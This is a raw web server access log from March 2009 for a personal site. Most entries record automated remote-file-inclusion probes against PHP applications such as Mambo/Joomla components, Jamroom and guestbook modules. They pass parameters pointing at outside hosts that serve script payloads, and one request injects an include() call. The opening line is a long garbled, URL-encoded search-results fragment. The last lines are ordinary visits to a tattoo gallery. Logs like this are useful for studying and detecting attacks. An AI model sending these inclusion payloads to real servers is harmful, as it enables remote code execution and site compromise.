96.9.45.2 - - [13/Mar/2009:02:24:35 -0500] "GET /logs/access_log.1219622400%22%20%20lang=%22en%22%3Etomdolan.pconline.com%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/nl.babelfish.yahoo.com/translate_url?trurl=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1219622400&lp=en_nl&.intl=nl&fr=sfp%22%20target=%22_blank%22%3EVertaal%20deze%20pagina%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22en%22%3E...%2086.58.154.237%20-%20-%20[24/Aug/2008:20:33:20%20-0500]%20%22GET%20/logs/index.php?option%20...%205.805%22%2085.25.139.184%20-%20-%20[24/Aug/2008:20:46:01%20-0500]%20%22GET%20/index.php?option%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1219622400%3C/span%3E%20-%20%3Cem%3E557k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%20spt%22%20href=%22http:/nl.wrs.yahoo.com/_ylt=A0oG756RB7pJAgkBm3JzKAx.;_ylu=X3oDMTB0N2VxcHRrBHNlYwNzcgRwb3MDOTA3BGNvbG8DYWMyBHZ0aWQD/SIG=125f1djl9/EXP=1237014801/**http%3a/www.indiacheck.com/search/component-option%22%20%20lang=%22en%22%3Ecomponent%20option%20-%20IndiaCheck%20Search%20%3Cwbr%20/%3EEngine%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/nl.babelfish.yahoo.com/translate_url?trurl=http%3A%2F%2Fwww.indiacheck.com%2Fsearch%2Fcomponent-option&lp=en_nl&.intl=nl&fr=sfp%22%20target=%22_blank%22%3EVertaal%20deze%20pagina%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22en%22%3EPINNACLE%20SYSTEMS%20-%20Alladin%20Component%20Option%20Connections%20and%20Specifications%20...%20component%20option,com_site...ap%20sitemap.php%20errors.php%20option,com_sitemap%20Itemid,%20...%3C/div%3E%3Cspan%20class=url%3Ewww.indiacheck.com/search/component-%3Cwbr%20/%3Eoption%3C/span%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%20spt%22%20href=%22http:/nl.wrs.yahoo.com/_ylt=A0oG756RB7pJAgkBnHJzKAx.;_ylu=X3oDMTB0MGx0bGEyBHNlYwNzcgRwb3MDOTA4BGNvbG8DYWMyBHZ0aWQD/SIG=129ddrtla/EXP=1237014801/**http%3a/www.mambers.com/archive/index.php%3ft-365.html%22%20%20lang=%22en%22%3EVB%20Template%20for%20Mambo%20[Archive]%20-%20%3Cwbr%20/%3EMambers.com%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/nl.babelfish.yahoo.com/translate_url?trurl=http%3A%2F%2Fwww.mambers.com%2Farchive%2Findex.php%3Ft-365.html&lp=en_nl&.intl=nl&fr=sfp%22%20target=%22_blank%22%3EVertaal%20deze%20pagina%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22en%22%3EHowever,%20with%20the%20%22published%20content%22%20component,%20I%20should%20recommend%20Only%20use%20the%20...%20See%20my%20sitemap:%20http:/www.casinotalks.com/index.php?option=com_sitemap&Itemid=26%20...%3C/div%3E%3Cspan%20class=url%3Ewww.mambers.com/archive/index.php?t-%3Cwbr%20/%3E365.html%3C/span%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%20spt%22%20href=%22http:/nl.wrs.yahoo.com/_ylt=A0oG756RB7pJAgkBnXJzKAx.;_ylu=X3oDMTB0OXR1djNxBHNlYwNzcgRwb3MDOTA5BGNvbG8DYWMyBHZ0aWQD/SIG=12e28058k/EXP=1237014801/**http%3a/site.crowdcontrolexperts.com/logs/access_090110.log%22%20%20lang=%22en%22%3Esite.crowdcontrolexperts.com/logs/%3Cwbr%20/%3Eaccess_090110.log%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/nl.babelfish.yahoo.com/translate_url?trurl=http%3A%2F%2Fsite.crowdcontrolexperts.com%2Flogs%2Faccess_090110.log&lp=en_nl&.intl=nl&fr=sfp%22%20target=%22_blank%22%3EVertaal%20deze%20pagina%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22en%22%3E...%20com_sitemap/Itemid,53/component/option,com_sitemap/Itemid,79/components%20...%2029%20-%20-%20[09/Jan/2009:06:29:42%20-0800]%20%22GET%20/component/option,com_sitemap/Itemid,50%20...%3C/div%3E%3Cspan%20class=url%3Esite.crowdcontrolexperts.com/logs/%3Cwbr%20/%3Eaccess_090110.log%3C/span%3E%20-%20%3Cem%3E543k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%20spt%22%20href=%22http:/nl.wrs.yahoo.com/_ylt=A0oG756RB7pJAgkBnnJzKAx.;_ylu=X3oDMTB0bGRxZXVjBHNlYwNzcgRwb3MDOTEwBGNvbG8DYWMyBHZ0aWQD/SIG=12tq8k23d/EXP=1237014801/**http%3a/www.resourcemecca.com/Web/Search.aspx%3fp=13%26q=useragent.inc.php%22%20%20lang=%22en%22%3Euseragent.inc.php%20-%20Web%20Search%20Engine%20%3Cwbr%20/%3Eby%20ResourceMecca.com%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/nl.babelfish.yahoo.com/translate_url?trurl=http%3A%2F%2Fwww.resourcemecca.com%2FWeb%2FSearch.aspx%3Fp%3D13%26q%3Duseragent.inc.php&lp=en_nl&.intl=nl&fr=sfp%22%20target=%22_blank%22%3EVertaal%20deze%20pagina%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22en%22%3E34:38%20Failed%20/webstats/VisitorsClickStream-22.html+/%20includes%20...%20option,com_sitemap/%20!scan%20/component/option,com_sitemap/Itemid,141/components%20...%3C/div%3E%3Cspan%20class=url%3Ewww.resourcemecca.com/Web/%3Cwbr%20/%3ESearch.aspx?p=13&q=useragent.inc.php%3C/span%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%20spt%22%20href=%22http:/nl.wrs.yahoo.com/_ylt=A0oG756RB7pJAgkBn3JzKAx.;_ylu=X3oDMTB0amIzOWYyBHNlYwNzcgRwb3MDOTExBGNvbG8DYWMyBHZ0aWQD/SIG=12531bltj/EXP=1237014801/**http%3a/www.thepointers.net/logs/access_090128.log%22%20%20lang=%22en%22%3Ewww.thepointers.net/logs/access_%3Cwbr%20/%3E090128.log%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/nl.babelfish.yahoo.com/translate_url?trurl=http%3A%2F%2Fwww.thepointers.net%2Flogs%2Faccess_090128.log&lp=en_nl&.intl=nl&fr=sfp%22%20target=%22_blank%22%3EVertaal%20deze%20pagina%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22en%22%3E...%20%22GET%20/logs/joomla/index.php?option=com_restaurante&task=http:/www.vust.net/contrex/id1.txt?%20...%20log/components/com_sitemap/sitemap.php?%20...%3C/div%3E%3Cspan%20class=url%3Ewww.thepointers.net/logs/access_%3Cwbr%20/%3E090128.log%3C/span%3E%20-%20%3Cem%3E531k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%20spt%22%20href=%22http:/nl.wrs.yahoo.com/_ylt=A0oG756RB7pJAgkBoHJzKAx.;_ylu=X3oDMTB0bnZvdWdkBHNlYwNzcgRwb3MDOTEyBGNvbG8DYWMyBHZ0aWQD/SIG=12f1oe3id/EXP=1237014801/**http%3a/www.katalogowanie-stron.pl.pisz.pl//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 425 "-""libwww-perl/5.810"
222.236.47.188 - - [13/Mar/2009:02:24:35 -0500] "GET /logs/access_log.1217030400/index.php?id=http://www.mercedesov.ru/b9db6c07db56bc6c5fb1b607061f731e/ec.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
222.236.47.188 - - [13/Mar/2009:02:24:36 -0500] "GET /index.php?id=http://www.mercedesov.ru/b9db6c07db56bc6c5fb1b607061f731e/ec.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
222.236.47.188 - - [13/Mar/2009:02:24:36 -0500] "GET /logs/index.php?id=http://www.mercedesov.ru/b9db6c07db56bc6c5fb1b607061f731e/ec.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
211.202.2.220 - - [13/Mar/2009:02:24:59 -0500] "GET /logs/access_log.1214956800/errors.php?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
81.169.143.242 - - [13/Mar/2009:02:25:58 -0500] "GET /logs//include.php?path[docroot]=http://kazandoska.ru/idv3.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.69"
81.169.143.242 - - [13/Mar/2009:02:25:58 -0500] "GET //include.php?path[docroot]=http://kazandoska.ru/idv3.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.69"
213.236.166.68 - - [13/Mar/2009:02:27:06 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.wssi.com//scancad/media/test.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
213.236.166.68 - - [13/Mar/2009:02:27:06 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.wssi.com//scancad/media/test.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
78.40.226.34 - - [13/Mar/2009:02:27:42 -0500] "GET /logs/access_log.1216684800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
81.169.143.242 - - [13/Mar/2009:02:27:54 -0500] "GET /logs//include.php?path[docroot]=http://kazandoska.ru/albid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.69"
81.169.143.242 - - [13/Mar/2009:02:27:54 -0500] "GET //include.php?path[docroot]=http://kazandoska.ru/albid.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.69"
200.45.224.18 - - [13/Mar/2009:02:28:15 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.wssi.com//scancad/media/test.txt?? HTTP/1.1" 404 299 "-""Mozilla/4.61 (Macintosh; I; PPC)"
200.45.224.18 - - [13/Mar/2009:02:28:15 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.wssi.com//scancad/media/test.txt?? HTTP/1.1" 404 294 "-""Mozilla/4.61 (Macintosh; I; PPC)"
124.217.242.70 - - [13/Mar/2009:02:28:17 -0500] "GET /logs/access_log.1218931200/?sourcedir=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 311 "-""libwww-perl/5.812"
200.165.79.34 - - [13/Mar/2009:02:28:27 -0500] "GET /lostpasswd.php?env%5Binclude_prefix%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.165.79.34 - - [13/Mar/2009:02:28:27 -0500] "GET /logs/lostpasswd.php?env%5Binclude_prefix%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
200.165.79.34 - - [13/Mar/2009:02:28:27 -0500] "GET /logs/access_log.1216512000/lostpasswd.php?env%5Binclude_prefix%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
200.165.79.34 - - [13/Mar/2009:02:29:48 -0500] "GET /logs/access_log.1225929600/lostpasswd.php?env%5Binclude_prefix%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
80.67.17.50 - - [13/Mar/2009:02:31:29 -0500] "GET /logs/access_log.1217289600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
80.67.17.50 - - [13/Mar/2009:02:31:29 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
80.67.17.50 - - [13/Mar/2009:02:31:29 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:02:31:32 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
80.67.17.50 - - [13/Mar/2009:02:31:32 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:02:31:36 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:02:31:39 -0500] "GET /logs/access_log.1217289600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:02:31:39 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:02:31:39 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:02:31:39 -0500] "GET /logs/access_log.1217289600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:02:31:46 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:02:31:46 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:02:31:46 -0500] "GET /logs/access_log.1217289600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
80.67.17.50 - - [13/Mar/2009:02:32:02 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
80.67.17.50 - - [13/Mar/2009:02:32:05 -0500] "GET /logs/access_log.1217289600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:02:32:11 -0500] "GET /logs/access_log.1217289600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:02:32:11 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:02:32:11 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:02:32:18 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:02:32:18 -0500] "GET /logs/access_log.1217289600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:02:32:18 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:02:32:26 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:02:32:26 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:02:32:26 -0500] "GET /logs/access_log.1217289600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
78.40.226.34 - - [13/Mar/2009:02:32:40 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
78.40.226.34 - - [13/Mar/2009:02:32:41 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
195.47.67.57 - - [13/Mar/2009:02:33:17 -0500] "GET /logs/access_log.1217721600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:02:33:21 -0500] "GET /logs/access_log.1219536000/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
96.9.45.2 - - [13/Mar/2009:02:33:24 -0500] "GET /logs/access_log.1219622400//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.810"
96.9.45.2 - - [13/Mar/2009:02:33:24 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
96.9.45.2 - - [13/Mar/2009:02:33:24 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
195.47.67.57 - - [13/Mar/2009:02:33:25 -0500] "GET /logs/access_log.1219536000/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:02:33:39 -0500] "GET /logs/access_log.1217721600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:02:35:16 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:02:35:16 -0500] "GET /logs/access_log.1217289600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:02:35:19 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:02:35:35 -0500] "GET /logs/access_log.1217721600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
65.254.49.34 - - [13/Mar/2009:02:37:18 -0500] "GET /logs/access_log.1216684800//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
81.169.143.242 - - [13/Mar/2009:02:37:21 -0500] "GET /logs/access_log.1211932800//include.php?path[docroot]=http://kazandoska.ru/albid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.69"
81.169.143.242 - - [13/Mar/2009:02:37:21 -0500] "GET //include.php?path[docroot]=http://kazandoska.ru/albid.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.69"
81.169.143.242 - - [13/Mar/2009:02:37:22 -0500] "GET /logs//include.php?path[docroot]=http://kazandoska.ru/albid.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.69"
81.169.143.242 - - [13/Mar/2009:02:37:23 -0500] "GET /logs/access_log.1211932800//include.php?path[docroot]=http://kazandoska.ru/idv3.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.69"
81.169.143.242 - - [13/Mar/2009:02:37:23 -0500] "GET //include.php?path[docroot]=http://kazandoska.ru/idv3.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.69"
81.169.143.242 - - [13/Mar/2009:02:37:24 -0500] "GET /logs//include.php?path[docroot]=http://kazandoska.ru/idv3.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.69"
67.76.163.60 - - [13/Mar/2009:02:39:03 -0500] "GET /logs/access_log.1217721600%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://gumansin.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:02:39:03 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://gumansin.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
81.169.143.242 - - [13/Mar/2009:02:39:03 -0500] "GET /logs/access_log.1216512000//include.php?path[docroot]=http://kazandoska.ru/idv3.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.69"
81.169.143.242 - - [13/Mar/2009:02:39:03 -0500] "GET /logs/access_log.1216512000//include.php?path[docroot]=http://kazandoska.ru/albid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.69"
67.76.163.60 - - [13/Mar/2009:02:39:03 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
81.169.143.242 - - [13/Mar/2009:02:39:15 -0500] "GET /?DOCUMENT_ROOT=http://kazandoska.ru/idoisir.txt??? HTTP/1.1" 200 1243 "-""libwww-perl/5.69"
81.169.143.242 - - [13/Mar/2009:02:39:15 -0500] "GET /logs/?DOCUMENT_ROOT=http://kazandoska.ru/idoisir.txt??? HTTP/1.1" 200 122039 "-""libwww-perl/5.69"
67.76.163.60 - - [13/Mar/2009:02:39:27 -0500] "GET /logs/access_log.1218931200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://gumansin.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
96.9.45.2 - - [13/Mar/2009:02:39:28 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
96.9.45.2 - - [13/Mar/2009:02:39:28 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
67.76.163.60 - - [13/Mar/2009:02:39:32 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://gumansin.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:02:39:32 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:02:39:32 -0500] "GET /logs/access_log.1217635200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:02:39:37 -0500] "GET /logs/access_log.1217548800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
81.169.143.242 - - [13/Mar/2009:02:39:51 -0500] "GET /?DOCUMENT_ROOT=http://www.kazandoska.ru/inc/id.txt??? HTTP/1.1" 200 1243 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
81.169.143.242 - - [13/Mar/2009:02:39:52 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.kazandoska.ru/inc/id.txt??? HTTP/1.1" 200 122039 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
81.169.143.242 - - [13/Mar/2009:02:42:18 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://kazandoska.ru/idoisir.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.69"
81.169.143.242 - - [13/Mar/2009:02:42:18 -0500] "GET /e404.php?DOCUMENT_ROOT=http://kazandoska.ru/idoisir.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.69"
70.95.88.205 - - [13/Mar/2009:02:43:08 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3921 "http://www.google.com/search?gbv=2&hl=en&ei=QA66SZOwBom4sAPjjoA5&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=vintage+tattoo+flash&spell=1""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
70.95.88.205 - - [13/Mar/2009:02:43:08 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
70.95.88.205 - - [13/Mar/2009:02:43:08 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
70.95.88.205 - - [13/Mar/2009:02:43:09 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
70.95.88.205 - - [13/Mar/2009:02:43:12 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2645 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
70.95.88.205 - - [13/Mar/2009:02:43:12 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
70.95.88.205 - - [13/Mar/2009:02:43:12 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
70.95.88.205 - - [13/Mar/2009:02:43:12 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
70.95.88.205 - - [13/Mar/2009:02:43:12 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
70.95.88.205 - - [13/Mar/2009:02:43:12 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20"
